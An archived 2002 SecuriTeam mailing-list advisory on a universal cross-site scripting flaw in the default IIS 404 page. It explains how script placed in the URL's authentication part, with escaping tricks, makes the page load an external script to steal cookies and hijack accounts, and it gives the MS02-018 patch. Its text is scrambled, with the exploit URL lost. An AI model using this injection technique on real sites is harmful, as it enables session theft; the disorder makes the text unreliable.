[NT] IIS Allows Universal Cross Site Scripting
From: support@securiteam.comDate: 04/10/02
- Previous message: support@securiteam.com: "[NEWS] Netware Web Search Engine and Microsoft IIS Help File Search Facility Cross-Site Scripting Holes"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Wed, 10 Apr 2002 23:53:08 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
IIS Allows Universal Cross Site Scripting
------------------------------------------------------------------------
SUMMARY
Cross Site Scripting is a term that describes the injection of script code
on foreign sites. A likely scenario where a malicious programmer would
inject code on e.g. hotmail.com to steal a victims cookies, allowing
him/her to hijack the victims email account. The default installation of
IIS is susceptible to such a CSS error.
DETAILS
Vulnerable systems:
* IIS version 4
* IIS version 5
* IIS version 5.1
Impact:
Stealing cookies from any IIS site, cross-domain scripting to any IIS
site, hijacking Hotmail and Passport accounts, elevating privileges
through ActiveX components, hijacking the MSN Messenger client, etc.
Details:
Every time IIS encounters a HTTP 404 errorcode, it will display a "404 not
found" page. This HTML file uses scripting to output a link to the
SERVER.TLD part of the URL, and by constructing a specially formed URL, it
is possible to include arbitrary script commands on the 404 page, thereby
enabling Cross Site Scripting on any IIS site. If we look at 404.htm, we
will notice a particular line of code:
document.write( '<A HREF="' + escape(urlresult) + '">' + displayresult +
"</a>");
displayResult is derived from the first instance of :// in the URL until
the next instance of /. This means that we will have to include our script
code before the path part of the URL. To accomplish this we include our
script code in the Basic Authentication part of the URL, but we first have
to escape any special characters in the code. Any / character will end
displayResult prematurely and any spaces will corrupt the DNS lookup, and
we therefore replace any space with a TAB (%09) and any / with %5Cx2f
(\x2f, as we will dynamically reference an external file).
Exploit:
The above will include and execute http://jscript.dk/test.js on YOUR.TLD,
Solution:
ADDITIONAL INFORMATION
The information has been provided by <mailto:Thor@jubii.dk> Thor Larholm.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
====================
DISCLAIMER:
http://
where YOUR.TLD is served by an IIS installation.
Apply the <http://jscript.dk/adv/TL001/#links> MS02-018 patch, or delete
the standard 404 errorhandler page. You could also use the opportunity to
make yourself a nice custom 404 errorhandler page. End-users can enable
the "Show friendly HTTP error messages" option in IE.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
Relevant Pages
... Below is the specific "Redirect to" ... I am a relative newbie to scripting but am motivated by the few ... >>> survey for the only site hosted on a particular server running IIS ...
(microsoft.public.inetserver.iis)
... I should add this occurs on Windows Vista Business Edition running IIS 7 ... Microsoft Visual Basic Scripting Edition brings active scripting to a wide ... VBScript is not a server programming language. ...
(microsoft.public.dotnet.framework.aspnet)
... > I've got the following task to do: I need to check various settings of a ... > website files on IIS. ... I have no experience with IIS at all, ... -- torgeir, Microsoft MVP Scripting and WMI, Porsgrunn Norway Administration scripting examples and an ONLINE version of the 1328 page Scripting Guide: ...
(microsoft.public.scripting.vbscript)
... which is more of a scripting question. ... I am exploring ways using ADSI and WMI to query the Active directory by ... The web application is built in ASP/COM on IIS 5.0 win2k platform. ...
(microsoft.public.inetserver.asp.general)
... which is more of a scripting question. ... I am exploring ways using ADSI and WMI to query the Active directory by ... The web application is built in ASP/COM on IIS 5.0 win2k platform. ...
(microsoft.public.inetserver.iis)
